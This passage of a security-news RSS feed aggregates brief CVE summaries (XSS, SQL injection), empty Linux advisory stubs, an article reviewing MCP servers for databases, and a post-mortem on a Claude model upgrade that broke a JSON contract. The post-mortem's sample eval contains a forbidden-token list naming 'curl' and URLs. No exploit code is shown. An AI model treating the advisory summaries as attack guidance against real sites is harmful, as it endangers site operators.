<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/popup-builder:popup_builder_plugin">Popup-Builder Popup Builder Plugin 3.49</a> on WordPress. Affected by this vulnerability is an unknown functionality of the file <em>post.php</em> of the component <em>POST Handler</em>. Such manipulation of the argument <em>post_title</em> leads to cross site scripting.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2019-25744">CVE-2019-25744</a>. The attack may be launched remotely. Furthermore, there is an exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-8981 | Custom Block Builder Plugin up to 4.2.x on WordPress Installation cross site scripting (EUVD-2026-35352)]]></title>
<description><![CDATA[A vulnerability was found in Custom Block Builder Plugin up to 4.2.x on WordPress. It has been declared as problematic. The affected element is an unknown function of the component Installation Handler. Such manipulation leads to cross site scripting.

This vulnerability is uniquely identified as...]]></description>
<link>https://tsecurity.de/de/3583946/sicherheitsluecken/cve-2026-8981-custom-block-builder-plugin-up-to-42x-on-wordpress-installation-cross-site-scripting-euvd-2026-35352/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583946/sicherheitsluecken/cve-2026-8981-custom-block-builder-plugin-up-to-42x-on-wordpress-installation-cross-site-scripting-euvd-2026-35352/</guid>
<pubDate>Tue, 09 Jun 2026 11:09:32 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/custom_block_builder_plugin">Custom Block Builder Plugin up to 4.2.x</a> on WordPress. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. The affected element is an unknown function of the component <em>Installation Handler</em>. Such manipulation leads to cross site scripting.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-8981">CVE-2026-8981</a>. The attack can be launched remotely. No exploit exists.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-11480 | Chengdu Everbrite Network Technology BeikeShop up to 1.6.0.22 Admin Design Builder Endpoint admin.php settings.value sql injection (EUVD-2026-35011)]]></title>
<description><![CDATA[A vulnerability has been found in Chengdu Everbrite Network Technology BeikeShop up to 1.6.0.22 and classified as critical. Impacted is an unknown function of the file beike/Admin/Routes/admin.php of the component Admin Design Builder Endpoint. Performing a manipulation of the argument settings.v...]]></description>
<link>https://tsecurity.de/de/3582551/sicherheitsluecken/cve-2026-11480-chengdu-everbrite-network-technology-beikeshop-up-to-16022-admin-design-builder-endpoint-adminphp-settingsvalue-sql-injection-euvd-2026-35011/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582551/sicherheitsluecken/cve-2026-11480-chengdu-everbrite-network-technology-beikeshop-up-to-16022-admin-design-builder-endpoint-adminphp-settingsvalue-sql-injection-euvd-2026-35011/</guid>
<pubDate>Mon, 08 Jun 2026 20:53:57 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/chengdu_everbrite_network_technology:beikeshop">Chengdu Everbrite Network Technology BeikeShop up to 1.6.0.22</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. Impacted is an unknown function of the file <em>beike/Admin/Routes/admin.php</em> of the component <em>Admin Design Builder Endpoint</em>. Performing a manipulation of the argument <em>settings.value</em> results in sql injection.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2026-11480">CVE-2026-11480</a>. It is possible to initiate the attack remotely. Furthermore, there is an exploit available.

To fix this issue, it is recommended to deploy a patch.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Zwei Probleme in cockpit-image-builder (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3581302/unix-server/security-zwei-probleme-in-cockpit-image-builder-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581302/unix-server/security-zwei-probleme-in-cockpit-image-builder-red-hat/</guid>
<pubDate>Mon, 08 Jun 2026 13:46:03 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[10 MCP servers to connect LLMs with databases]]></title>
<description><![CDATA[Model Context Protocol (MCP) has gained considerable momentum as a standard connector between LLM-powered tools and local systems, internal and external APIs, and data sources. From major clouds to devops tools, MCP servers are enabling powerful, AI-powered development and operations capabilities...]]></description>
<link>https://tsecurity.de/de/3580893/ai-nachrichten/10-mcp-servers-to-connect-llms-with-databases/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580893/ai-nachrichten/10-mcp-servers-to-connect-llms-with-databases/</guid>
<pubDate>Mon, 08 Jun 2026 11:03:51 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP) has gained considerable momentum as a standard connector between LLM-powered tools and local systems, internal and external APIs, and data sources. From <a href="https://www.infoworld.com/article/4129024/five-mcp-servers-to-rule-the-cloud.html">major clouds</a> to <a href="https://www.infoworld.com/article/4096223/10-mcp-servers-for-devops.html">devops tools</a>, MCP servers are enabling powerful, AI-powered development and operations capabilities through natural language commands.</p>



<p>Nowhere is this more true than in the world of databases. Most major database platforms now support agentic access through MCP servers. Using an MCP server for databases, you and your AI agent proxies can perform lookups, create and update data, and perform administrative tasks without you having to write SQL by hand.</p>



<p>The MCP server could also guide your LLMs to write new code or build automations that align with your database schema, like its tables, structure, and fields, as well as embeddings, indexes, and metadata. It could also aid debugging by enabling faster queries to surface data issues or misconfigurations, along with plenty of other possible use cases.</p>



<p>Below, we’ll cover official MCP servers from some of the top platform options across major database styles. Though maturity varies, the MCP servers discussed below represent some of the best vendor-backed offerings available today across relational <a href="https://www.infoworld.com/article/4140734/the-revenge-of-sql-how-a-50-year-old-language-reinvents-itself.html" data-type="link" data-id="https://www.infoworld.com/article/4140734/the-revenge-of-sql-how-a-50-year-old-language-reinvents-itself.html">SQL</a>, <a href="https://www.infoworld.com/article/2260280/what-is-nosql-databases-for-a-cloud-scale-future.html" data-type="link" data-id="https://www.infoworld.com/article/2260280/what-is-nosql-databases-for-a-cloud-scale-future.html">NoSQL</a>, <a href="https://www.infoworld.com/article/2265778/what-is-a-graph-database-a-better-way-to-store-connected-data.html" data-type="link" data-id="https://www.infoworld.com/article/2265778/what-is-a-graph-database-a-better-way-to-store-connected-data.html">graph</a>, <a href="https://www.infoworld.com/article/2335281/vector-databases-in-llms-and-search.html" data-type="link" data-id="https://www.infoworld.com/article/2335281/vector-databases-in-llms-and-search.html">vector</a>, and <a href="https://www.infoworld.com/article/2268778/what-is-a-data-warehouse-the-source-of-business-intelligence.html" data-type="link" data-id="https://www.infoworld.com/article/2268778/what-is-a-data-warehouse-the-source-of-business-intelligence.html">data warehouse</a> systems.</p>



<p>These servers can be used by any MCP-compatible tool, IDE, or agent, whether it’s Claude Code, Codex, Cursor, Gemini CLI, Google Antigravity, VS Code, Windsurf, or something else. Adding them is typically simple, often involving a lightweight JSON addition to your MCP configuration file.</p>



<h2 class="wp-block-heading"><a></a><a></a>Amazon Aurora MCP Servers</h2>



<p><a href="https://www.mysql.com/">MySQL</a> and <a href="https://www.postgresql.org/">PostgreSQL</a> are the world’s most widely-used <a href="https://www.infoworld.com/article/2262355/what-is-open-source-software-open-source-and-foss-explained.html">open source</a> databases. However, in both cases, there is no canonical MCP server—what we see are different MCP servers emerging across vendors. One of these vendors is Amazon Web Services (AWS), which offers official MCP servers for Amazon Aurora, its managed relational database service compatible with both MySQL and PostgreSQL.</p>



<p>According to the <a href="https://github.com/awslabs/mcp/tree/main/src/mysql-mcp-server">documentation on GitHub</a>, the <a href="https://awslabs.github.io/mcp/servers/mysql-mcp-server">Amazon Aurora MySQL MCP Server</a> can be used to convert natural language commands into MySQL-compatible SQL queries, which can then be executed against Aurora MySQL databases. Similarly, the <a href="https://github.com/awslabs/mcp/tree/main/src/postgres-mcp-server">Aurora Postgres MCP Server</a> provides MCP tools for working on PostgreSQL databases. The <a href="https://github.com/awslabs/mcp/tree/main/src/aurora-dsql-mcp-server">Aurora DSQL MCP Server</a> does the same for distributed Postgres databases.</p>



<p>AWS provides a <a href="https://github.com/awslabs/mcp">growing portfolio of official MCP servers</a> across its product line, including MCP servers for other Amazon database platforms like <a href="https://awslabs.github.io/mcp/servers/dynamodb-mcp-server">DynamoDB</a>, <a href="https://awslabs.github.io/mcp/servers/elasticache-mcp-server">ElastiCache</a>, and <a href="https://awslabs.github.io/mcp/servers/redshift-mcp-server">Redshift</a>. If you’re a heavy AWS shop and you want to enable LLM interactions with your data, these are sensible choices.</p>



<h1 class="wp-block-heading"><a></a>BigQuery MCP Server</h1>



<p>BigQuery is Google’s cloud-based data analytics platform, and a popular data source for AI applications. BigQuery users with API access configured can also utilize the <a href="https://docs.cloud.google.com/bigquery/docs/use-bigquery-mcp">BigQuery MCP Server</a> to interact with the platform using MCP-compatible AI clients.</p>



<p>Using the remote <a href="https://docs.cloud.google.com/bigquery/docs/use-bigquery-mcp">BigQuery MCP Server</a>, engineers can generate and execute queries on data sources, or return metadata on datasets, tables, and schema. This can be done with a simple natural language prompt like “List the datasets in project <code>PROJECT_ID</code>.” Results are filterable by region, data set ID, column name, and more.</p>



<p>As part of Google’s fully-managed, remote-hosted MCP portfolio, the BigQuery MCP Server provides some peace of mind regarding security, maintenance, and ease of use for distributed teams. The MCP tools are subject to some limitations, however, in terms of query result size, processing time, and other factors. If you’re using BigQuery and you want more agentic control, you’ll want to check this one out.</p>



<h2 class="wp-block-heading"><a></a>Elastic Agent Builder</h2>



<p>Another important database category includes platforms designed for keyword and semantic search. In this space, <a href="https://www.elastic.co/elasticsearch">Elasticsearch</a> is commonly deployed. Instead of providing a single MCP server, Elasticsearch provides the <a href="https://www.elastic.co/docs/explore-analyze/ai-features/elastic-agent-builder">Elastic Agent Builder</a>, which is a more comprehensive framework aimed at agentic workflows.</p>



<p>Using Elastic Agent Builder, you can chat with an agent to retrieve data context from Elasticsearch data and extend it into various environments. The Agent Builder itself includes an <a href="https://www.elastic.co/docs/explore-analyze/ai-features/agent-builder/mcp-server">MCP server</a> endpoint for programmability and exposing the agent to other clients.</p>



<p>Unlike others on this list, this is not a direct MCP interface to raw Elasticsearch APIs. Instead, it’s an interface that exposes skills from the agent platform. This should also not be confused with the <a href="https://github.com/elastic/mcp-server-elasticsearch/releases">Elasticsearch MCP Server</a>, released in mid-2025, which has since been deprecated.</p>



<p>A possible downside of using this utility is that it includes an additional layer between your IDE or agent and the data you’re searching. The agent setup requires a higher subscription and takes additional steps to configure compared to other MCP servers.</p>



<p>That said, if you want an extensible common layer to interact with both Elasticsearch and external MCP servers, while centralizing responsibilities like permissions, this is an interesting proposition.</p>



<h2 class="wp-block-heading"><a></a>MCP servers for Neo4j</h2>



<p>Graph databases are another key NoSQL database type these days, specializing in using nodes and edges to accelerate queries of highly interconnected data. Of these, <a href="https://neo4j.com/product/neo4j-graph-database/">Neo4j</a> is a popular graph database option.</p>



<p>The <a href="https://neo4j.com/developer/genai-ecosystem/model-context-protocol-mcp/">Official MCP Server for Neo4j</a> works with all kinds of Neo4j deployment (desktop, sandbox, self-managed, and the managed Neo4j Aura cloud service), and allows LLM-based clients to retrieve graph schema, execute read and write statements, execute graph algorithms, and more.</p>



<p>In addition, several other MCP servers for Neo4j are <a href="https://github.com/neo4j-contrib/mcp-neo4j">available from Neo4j Labs</a>. These have specialized uses, such as generating Cypher queries from natural language, maintaining an in-memory graph database, modeling and visualizing graph, and interacting with the Neo4j Aura API.</p>



<p>The first MCP server for Neo4j was developed in December 2024. If you’re an avid Neo4j user and want to experiment with interacting with your graph databases in a chat-infused way, these stand as an interesting platform of servers.</p>



<h2 class="wp-block-heading">MCP Toolbox for Databases</h2>



<p>Google’s <a href="https://github.com/googleapis/mcp-toolbox">MCP Toolbox for Databases</a> is a notable MCP server because it’s a popular catch-all for various database types. Unlike the other entries on this list, this server connects LLMs not to a single managed database, but unifies LLM access to multiple systems. The open source utility ships with <a href="https://mcp-toolbox.dev/documentation/configuration/prebuilt-configs/">pre-built configurations</a> for nearly 30 databases including PostgreSQL, MySQL, SQL Server, Oracle Database, MongoDB, Redis, Neo4j, and Snowflake, as well as the databases in Google Cloud.</p>



<p>Once you define data sources in a tools.yaml file, you can use MCP Toolbox to perform structured queries or semantic searches against databases directly from within an IDE or agentic client using plain English. MCP tools translate commands into actions like <code>list_tables</code> and <code>execute_sql</code>.</p>



<p>MCP Toolbox for Databases is mature, originally built as a generative AI utility and later re-worked for MCP-style workflows. It offers numerous download, configuration, and interaction methods.</p>



<p>If you’re using a variety of databases on Google Cloud and elsewhere and you want an “all-in-one” MCP server, MCP Toolbox for Databases is a great place to start.</p>



<h2 class="wp-block-heading"><a></a>MongoDB MCP Server</h2>



<p><a href="https://www.mongodb.com/">MongoDB</a> is the popular NoSQL document-oriented database. The creators of MongoDB have released an <a href="https://github.com/mongodb-js/mongodb-mcp-server">official MCP server</a> that works with the open-source database as well as the company’s cloud-hosted MongoDB Atlas database platform.</p>



<p>The MongoDB MCP Server provides a <a href="https://github.com/mongodb-js/mongodb-mcp-server#tool-list">number of tools</a> to interact with MongoDB. You can query the database, return information on collections, create or remove collections or indexes, gather statistics on database usage, and more. Other tools enable MongoDB Atlas operations, like creating users or clusters, returning cluster data, and other functions.</p>



<p>The server’s tools are read-only by default but can be switched to allow write capabilities. It can be used locally, but also supports Streamable HTTP transport for remote servers, although that comes with greater security concerns.</p>



<p>For those using MongoDB and wanting to hook their AI-enabled IDE or CLI up with more automated powers, the official MongoDB MCP Server is worth checking out.</p>



<h2 class="wp-block-heading">Pinecone MCP server</h2>



<p>Among <a href="https://www.infoworld.com/article/4060211/do-vector-native-databases-beat-add-ons-for-ai-applications.html">vector-native databases</a>, <a href="https://www.pinecone.io/">Pinecone</a> stands as a strong, widely used option with a well-designed <a href="https://docs.pinecone.io/reference/api/introduction">API</a> and comprehensive SDKs. The <a href="https://docs.pinecone.io/guides/operations/mcp-server">Pinecone MCP server</a> extends this experience, allowing users to query its documentation and execute functionality via AI agents and AI-enabled IDEs.</p>



<p>To date, the Pinecone MCP server consists of nine MCP tools. These cover read-only actions, like knowledge gathering via the Pinecone official documentation and querying vector records, index metadata, configurations, and statistics. It also allows for write operations like updating records and creating new indexes.</p>



<p>Released in mid-2025, the Pinecone MCP server is one of the more complete early implementations, with easy configuration and installation.</p>



<p>For those using Pinecone who want to test new LLM-assisted workflows for creating indexes with embeddings, performing reranking, or testing results using natural language commands, the Pinecone MCP server is worth trying out.</p>



<h2 class="wp-block-heading"><a></a>Redis MCP</h2>



<p>An ultra-fast in-memory database, Redis is commonly used for caching, real-time analytics, and other latency-sensitive use cases. And as you might have guessed, the company behind the Redis database provides an <a href="https://redis.io/docs/latest/integrate/redis-mcp/">official MCP server</a>. The server allows read, query, and write capabilities.</p>



<p>Developers can use Redis MCP from an LLM client to perform high-level actions to analyze, reference, or embed Redis data and interact with the Redis server within their prompts. The documentation suggests some example prompts for common use cases, such as “Cache this item,” “How many keys does my database have?,” and “What is user:1’s email?”</p>



<p>Unlike other MCP servers, which only allow a slice of platform capabilities, Redis MCP offers full Redis support. This enables working with Redis constructs such as hashes, lists, sets, sorted sets, streams, and more, according to the <a href="https://github.com/redis/mcp-redis">GitHub repository</a>.</p>



<p>One possible drawback is that Redis MCP has yet to support Streamable HTTP transport. Until this is developed, the server is constrained to local deployment. But for those seeking a local MCP server to work with Redis data, this is the best choice.</p>



<h2 class="wp-block-heading"><a></a>Snowflake MCP Server</h2>



<p>Snowflake is a cloud-hosted, AI-enabled data platform widely used in enterprise contexts for data warehousing, data analytics, and data engineering purposes. Compared to other data storage systems, Snowflake is unique in that it’s more fully managed and combines structured and non-structured data types.</p>



<p>The <a href="https://www.snowflake.com/en/developers/guides/getting-started-with-snowflake-mcp-server/">Snowflake MCP Server</a>, available on <a href="https://github.com/Snowflake-Labs/mcp">GitHub</a>, can be used to perform many of the standard Snowflake platform operations. This includes a “fuzzy” search of all records via Snowflake’s Cortex Search and structured data semantic lookups using Cortex Analyst.</p>



<p>Other abilities include object management operations like creating, updating, and deleting records. The server also can invoke other agentic-designed capabilities, like the ability to generate and execute SQL statements against back-end databases.</p>



<p>Snowflake MCP Server is well-thought-out and well-documented, with walkthroughs for various agent and deployment patterns. Those already building with Snowflake should find it complements the mechanics they already employ.</p>



<h2 class="wp-block-heading"><a></a>Supabase MCP Server</h2>



<p>A longtime open-source favorite, <a href="https://www.postgresql.org/">PostgreSQL</a> is one of the most popular and trusted object-relational SQL-based database systems. With an active <a href="https://leaddev.com/technical-direction/postgresql-database-quietly-ate-world">open source community</a>, Postgres has been maturing for decades. Given its open source nature, there isn’t a single “official” MCP server for the platform. Anthropic built an original reference implementation, but it’s <a href="https://github.com/modelcontextprotocol/servers-archived/tree/main/src/postgres">now archived</a>.</p>



<p>Instead, database platforms built on PostgreSQL provide <a href="https://dbhub.ai/blog/state-of-postgres-mcp-servers-2025">different flavors</a> of MCP servers, with a range of vendor neutrality and specificity. One notable option is the <a href="https://github.com/supabase-community/supabase-mcp#database">Supabase MCP Server</a>, provided by <a href="https://supabase.com/mcp">Supabase</a>, a cloud-based “back end as a service” and Postgres development platform.</p>



<p>Supabase MCP Server connects AI agents with Supabase projects, allowing engineers to issue natural language commands to manage tables, query data, get logs, fetch configuration information, and more. The Supabase MCP Server is pre-1.0 release and some features are still experimental.</p>



<p>If you’re an engineer using Supabase and looking for an MCP server to connect your AI assistant with your Postgres databases, this is a good tool to test out.</p>



<h2 class="wp-block-heading"><a></a><a></a>Other MCP servers for databases to consider</h2>



<p>So far, we’ve reviewed official, vendor-backed MCP servers from some of the most-adopted managed databases. However, numerous MCP servers exist across other database platforms and types.</p>



<p>One MCP server that aggregates LLM access across various database types is <a href="https://github.com/bytebase/dbhub">DBHub</a>, which works with MySQL, PostgreSQL, SQL Server, MariaDB, and SQLite. Developed by <a href="https://www.bytebase.com/">Bytebase</a>, DBHub is described as a zero-dependency, token-efficient MCP server.</p>



<p>For SQL, the options are nearly endless. Official servers exist for <a href="https://devblogs.microsoft.com/azure-sql/introducing-sql-mcp-server/">Microsoft Azure SQL</a> and <a href="https://github.com/motherduckdb/mcp-server-motherduck">DuckDB</a>. PulseMCP catalogs more than <a href="https://www.pulsemcp.com/servers?q=mysql">100 MCP servers</a> for <a href="https://dev.to/benborla/mcp-server-for-mysql-3jf1#main-content">MySQL</a>, although most are unofficial, solo-creator open source projects. Of these, one of the most starred is <a href="https://github.com/benborla/mcp-server-mysql">MCP Server for MySQL</a>, developed by full-stack developer <a href="https://benborla.dev/">Ben Borla</a> and optimized for Claude Code.</p>



<p>For Postgres, notable alternatives to Supabase include <a href="https://github.com/pgEdge/pgedge-postgres-mcp/">pgEdge Postgres MCP</a>, <a href="https://neon.com/docs/ai/neon-mcp-server">Neon MCP server</a>, and <a href="https://github.com/crystaldba/postgres-mcp">Postgres MCP Pro</a>. For vector databases, others beyond Pinecone have been quick to adopt MCP as well, including <a href="https://docs.weaviate.io/weaviate/mcp/docs-mcp-server">Weaviate</a> and <a href="https://milvus.io/docs/milvus_and_mcp.md">Milvus</a>.</p>



<h2 class="wp-block-heading"><a></a>Using MCP for databases: what to watch out for</h2>



<p>Before diving into MCP servers for enterprise databases, it’s important to understand the security risks. For instance, prompt injection remains an <a href="https://dbhub.ai/blog/state-of-postgres-mcp-servers-2025">unsolved problem</a>, so it’s recommended to limit permissions for SQL statements.</p>



<p>To mitigate this, <a href="https://github.com/supabase-community/supabase-mcp#security-risks">Supabase recommends</a> enabling AI client settings that require manual approval for each tool call before execution. Experts also recommend assigning only the minimum permissions required and avoiding exposure of sensitive data like API credentials. Due diligence around authentication and authorization is especially important when hosting remote servers.</p>



<p>Lastly, to avoid shadow IT, it’s becoming common practice to catalog the internal MCP servers you use, even for experimental projects. For this, experts recommend an <a href="https://www.infoworld.com/article/4145014/how-to-build-an-enterprise-grade-mcp-registry.html">MCP registry</a> that documents approved servers. An MCP registry improves both MCP server discovery and security awareness.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Colony builder Star Trek: Outposts Unknown revealed]]></title>
<description><![CDATA[Not only are we getting the horror-adventure Star Trek: Shadow Frontier, we're also getting a colony builder with Star Trek: Outposts Unknown.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3580694/linux-tipps/colony-builder-star-trek-outposts-unknown-revealed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580694/linux-tipps/colony-builder-star-trek-outposts-unknown-revealed/</guid>
<pubDate>Mon, 08 Jun 2026 09:33:29 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Not only are we getting the horror-adventure Star Trek: Shadow Frontier, we're also getting a colony builder with Star Trek: Outposts Unknown.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/65330378id29169gol.jpg" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/06/colony-builder-star-trek-outposts-unknown-revealed/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[When Claude changed, everything changed: Managing AI blast radius in production]]></title>
<description><![CDATA[Our system did one thing, and it did it well: It turned natural-language questions into API calls.The users were analysts, account managers, and operations leads. They knew what data they needed, but assembling it manually meant pulling from four dashboards, two BI tools, and a Salesforce report ...]]></description>
<link>https://tsecurity.de/de/3578282/it-nachrichten/when-claude-changed-everything-changed-managing-ai-blast-radius-in-production/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578282/it-nachrichten/when-claude-changed-everything-changed-managing-ai-blast-radius-in-production/</guid>
<pubDate>Sat, 06 Jun 2026 21:31:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Our system did one thing, and it did it well: It turned natural-language questions into API calls.</p><p>The users were analysts, account managers, and operations leads. They knew what data they needed, but assembling it manually meant pulling from four dashboards, two BI tools, and a Salesforce report builder. With our system, they typed the request in plain English. A request like "Compile a report on sales volume for January through March 2026 for the Northeast region, broken down by city" was translated into an API call that the system could act on:</p><p><i>json</i></p><p><i>{</i></p><p><i>  "description": "User requested sales volume for the given date range, here is the API call to get the response",</i></p><p><i>  "api_call": "/api/sales_volume",</i></p><p><i>  "post_body": {</i></p><p><i>    "start_date": "2026-01-01",</i></p><p><i>    "end_date": "2026-03-31",</i></p><p><i>    "region": "northeast"</i></p><p><i>  }</i></p><p><i>}</i></p><p>The rest of the pipeline was conventional engineering. The system dispatched the call to the right backend — we had integrations with internal reporting portals, Salesforce, and several homegrown services — applied a large language model (LLM)(-generated JSON query to filter and shape the response, and delivered it via email, as a Drive document, or rendered as a chart in the browser.</p><p>By mid-2025, the system was generating several hundred reports a month. These reports were consumed by leadership and analysts and circulated to external stakeholders. It had become the default way most teams pulled ad-hoc data.</p><p>The contract between the LLM and the rest of the system was a structured JSON object as described in the above example.</p><p><i>json</i></p><p><i>{</i></p><p><i>  "description": "User requested sales volume for the given date range, here is the API call to get the response",</i></p><p><i>  "api_call": "/api/sales_volume",</i></p><p><i>  "post_body": {</i></p><p><i>    "start_date": "2026-01-01",</i></p><p><i>    "end_date": "2026-03-31",</i></p><p><i>    "region": "northeast"</i></p><p><i>  }</i></p><p><i>}</i></p><p>We built it on Claude Sonnet 3.5 in early 2025. We upgraded to 3.7 without incident, and to 4.0 without incident. By the time Sonnet 4.5 shipped, we had grown complacent about the stability and predictability of LLMs in solving what we believed was a simple problem. <a href="https://venturebeat.com/technology/anthropics-new-claude-can-code-for-30-hours-think-of-it-as-your-ai-coworker">Model upgrades</a> had become routine, like bumping a minor version of a well-behaved library.</p><p>Then we rolled out 4.5. For a meaningful percentage of requests, the model began folding the contents of post_body into the description field. Two failure modes followed.</p><p>First, the filter parameters never reached the API. Our system read <i>post_body</i> as the source of truth for the request payload, and that field came back empty. The API call was made without the date range or region filter. Depending on the specific API being called, the backend either returned sales volume for all time or all regions or returned a 500 error.</p><p>Second, the model started asking clarifying questions in its response. This was new. Earlier versions always took a best-effort approach to an ambiguous request and returned a structured object. Sonnet 4.5, being more cautious, would sometimes respond with a question instead. Our system had no path for this. It had been built on the assumption that every model invocation would result in an API call. There was no human-in-the-loop component and no state to hold a partially completed request. This caused downstream systems to break in multiple ways.</p><p>We rolled back to 4.0. That was harder than it should have been: Between the 4.0 and 4.5 deployments, our team had added new API integrations, all of which were qualified against 4.5. Reverting the model meant requalifying every one of them against 4.0 under time pressure.</p><h2><b>Why traditional engineering discipline fails here</b></h2><p>Software engineering rests on the ability to bound the effect of a change. When you upgrade a driver or library, you read the release notes to see whether to expect breaking changes. Unit tests circumscribe what could possibly have moved. You can leverage the following property: The system being changed is deterministic enough that its behavior can be predicted, or at least sampled densely enough to give you confidence. The blast radius is bounded by construction.</p><p><a href="https://venturebeat.com/security/claude-mythos-exposed-a-hard-truth-your-enterprise-patching-process-is-way-too-slow">LLM-backed systems</a> break this assumption. The component that produces your output is not under your control. You cannot diff a model version bump from 4.0 to 4.5. It is a wholesale replacement of the functionality on which your system depends.</p><p>This is what we mean by an <b><i>infinite blast radius</i></b>: a change whose downstream effects cannot be enumerated in advance because the input space (natural language) and the failure modes (anything the model might do differently) are both unbounded.</p><h2><b>Anatomy of the failure</b></h2><p>The post-mortem revealed that our prompt had always been under-specified. We had told the model to return a JSON object with three fields. We had described what each field was for. We did not explicitly state that the description must be a natural-language string and must not contain serialized representations of other fields.</p><p>Earlier versions of the model inferred this constraint from context. Sonnet 4.5, evidently better at being "helpful" in its formatting choices, decided that inquiring for clarification or providing the request body in the description made the response more useful. From the model's perspective, this was a reasonable interpretation of an ambiguous instruction. However, this violated the assumptions under which our system was built.</p><p>The bug was not in the model. The bug was in our assumption that the model would continue to fill in our specification gaps as it always had. Three successful upgrades had trained us to believe those gaps were safe.</p><p>Structured output modes and tool-use APIs would have caught this specific failure at the schema level. We weren't using them for engineering reasons outside the scope of this article. But schemas only constrain syntax, not semantics. A schema cannot specify that a clarifying question shouldn't appear in a system with no path for clarification, or that a date range should never silently default to all-time. Schemas solve the easier half of the problem.</p><h2><b>The evals-first architecture</b></h2><p>The discipline that closes this gap is to treat the evaluation suite — not the prompt — as the formal <a href="https://venturebeat.com/technology/why-prompt-debt-retrieval-debt-and-evaluation-debt-are-quietly-reshaping-enterprise-ai-risk">specification of the system</a>. The prompt is an <i>implementation</i> of the spec. The model is an <i>interpreter</i>. The evals are the spec itself, and any model or prompt change is valid if and only if it passes them.</p><p>In practice, an eval is a triple: An input, a property the output must satisfy, and a scoring function. For our system, the eval that would have caught the 4.5 regression looks roughly like this:</p><p><i>python</i></p><p><i>def test_description_contains_no_serialized_payload(response):</i></p><p><i>    desc = response["description"].lower()</i></p><p><i>    forbidden = ["curl", "post_body", "{", "http://", "https://"]</i></p><p><i>    assert not any(token in desc for token in forbidden), \</i></p><p><i>        f"description leaked structured content: {response['description']}"</i></p><p>A few hundred such properties, some written by hand for known-important invariants, some generated as regression tests from real production traffic, some scored by an LLM-as-judge for fuzzier qualities like tone, become a gate. Model upgrades and prompt changes should be treated as pull requests that must turn the suite green before they merge.</p><p>Evals are expensive to build and maintain. They drift as your product changes. LLM-as-judge scoring introduces its own variance in outcomes. And the suite can only catch failure modes you have thought to specify — you cannot eval your way to safety against a category of failure you have never imagined. We learned this lesson the hard way: Nobody on our team had ever written an assertion that said "the description field should not contain a curl command," because nobody had thought the model would put one there.</p><p>Evals are not a silver bullet. They give you the ability to bound the blast radius of a change in the only way available when the underlying function is a black box: By densely sampling the input-output response you actually care about, and refusing to deploy when that behavior moves.</p><h2><b>The roadmap</b></h2><p>The engineering community has yet to develop a body of knowledge for writing effective evals. There are no widely accepted standards for what 'coverage' means in natural language input spaces. CI/CD systems were not built to gate probabilistic test outcomes. As agents take on more autonomous work — writing code, moving money, scheduling infrastructure changes — the gap between "the model passed our smoke tests" and "we know what this system will do in production" becomes the central engineering problem of the next several years.</p><p>The teams that close that gap will be the ones who stop treating evals as a quality-assurance afterthought and start treating them as the actual specification of what their system is.</p><p><i>Vijay Sagar Gullapalli is Founding AI Engineer at Adopt AI and a USPTO-patented inventor.</i></p><p><i>Sarat Mahavratayajula is a Senior Software Engineer at Sherwin-Williams. </i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Preisgabe von Informationen in perl-ExtUtils-Builder (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3576214/unix-server/security-preisgabe-von-informationen-in-perl-extutils-builder-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576214/unix-server/security-preisgabe-von-informationen-in-perl-extutils-builder-fedora/</guid>
<pubDate>Fri, 05 Jun 2026 19:46:24 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Preisgabe von Informationen in perl-ExtUtils-Builder-Compiler (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3576213/unix-server/security-preisgabe-von-informationen-in-perl-extutils-builder-compiler-fedora/</link>
